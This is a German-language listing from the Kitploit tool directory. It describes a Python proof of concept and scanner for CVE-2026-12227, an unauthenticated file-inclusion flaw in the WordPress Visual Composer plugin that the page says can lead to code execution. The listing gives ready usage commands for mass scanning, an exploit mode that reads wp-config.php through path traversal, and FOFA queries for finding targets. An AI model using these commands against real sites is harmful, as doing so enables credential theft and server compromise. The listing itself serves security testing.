Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-12227 — Python-3-PoC und Scanner für CVE-2026-12227, eine unauthentifizierte lokale Dateieinbindung in WordPress Visual Composer Website Builder über den Parameter vcv-template. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-12227
AufklärungSchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmurrez/cve-2026-12227

CVE-2026-12227

Python-3-PoC und Scanner für CVE-2026-12227, eine unauthentifizierte lokale Dateieinbindung in WordPress Visual Composer Website Builder über den Parameter vcv-template.

1vor 9h 57mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2026-12227 — Visual Composer Website Builder Unauthentifizierte LFI

Python 3 PoC für CVE-2026-12227 (Wordfence): Local File Inclusion über den vcv-template Query-Parameter in Visual Composer Website Builder (visualcomposer auf wordpress.org).

PlattformWordPress-Plugin
KomponenteVisual Composer Website Builder
Betroffen≤ 45.16.0
Behoben in> 45.16.0 (WP Trac 3619572) — neueste stabile Version verwenden (z. B. 45.16.3+)
CVSS9.8 Kritisch (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
AuthUnauthentifiziert
CWECWE-98
NichtWPBakery (js_composer) oder SAP NetWeaver Visual Composer

Zusammenfassung

Bei anfälligen Versionen berücksichtigen öffentliche Seitenaufrufe das vom Angreifer kontrollierte vcv-template (mit vcv-template-type) während der WordPress-template_include-Verarbeitung innerhalb von PageTemplatesController. Dadurch können vom Angreifer gewählte Dateien auf der Festplatte eingebunden werden; PHP-Dateien können ausgeführt werden (RCE). Wordfence weist auf Ketten mit hochgeladenen „sicheren" Erweiterungen in einigen Setups hin.

Angriffsfläche

  • Erfordert installiertes Plugin und eine Front-End-Seite, die mit VC erstellt wurde (normale Permalink).
  • Die Probe fügt Query-Parameter hinzu, z. B. ?vcv-template-type=vc&vcv-template=blank oder LFI-Pfade unter vcv-template.
  • Verwandte Parameter: vcv-template-type, vcv-template-stretched.

Voraussetzungen

root@kitploit:~
pip install -r requirements.txt

Python 3.8+.

Verwendung

root@kitploit:~
# Version + Plugin + VC-Seiten-Crawl + Template/LFI-Probes
python poc.py -u https://target.example --mode check

# Bekannte VC-Landingpage
python poc.py -u https://target.example --mode check --page-url /

# Massenscan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet

# Benutzerdefinierter Include-Pfad (nur autorisiertes Testen)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php

# JSON für Skripting
python poc.py -u https://target.example --mode check --json

Ausgabe

DateiBedeutung
cve_2026_12227_results.jsonlVollständiges JSON pro Ziel

Statuswerte

FOFA-Hinweise

root@kitploit:~
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"

Technische Hinweise

  • Codepfad: visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
  • Check behandelt Param-Kontrolle oder LFI-Marker als exploitable_candidate; vor der Annahme von RCE auf einem Staging-Klon bestätigen.
  • Premium TemplateFilter / Theme-Builder-Addons können auf einigen Seiten die erreichbaren Pfade erweitern.

Rechtliches

Nur auf Systemen verwenden, die Sie besitzen oder für die Sie eine ausdrückliche Testgenehmigung haben.

Tool herunterladen
hits.txtKandidaten-Hostnamen
candidates.jsonlCheck-Modus-Zusammenfassung (page_url, status, lfi)
StatusBedeutung
lfi_confirmedAntwort entspricht wp-config / /etc/passwd / version.php Heuristiken
vcv_template_controllablevcv-template=blank ändert das Layout gegenüber der Baseline (anfälliger Parameter wird berücksichtigt)
plugin_vuln_no_surfaceAlte Plugin-Version, aber keine VC-Seite oder Parameter wird ignoriert
no_vc_pagePlugin vorhanden, keine VC-Marker auf gecrawlten Pfaden
patchedVersion > 45.16.0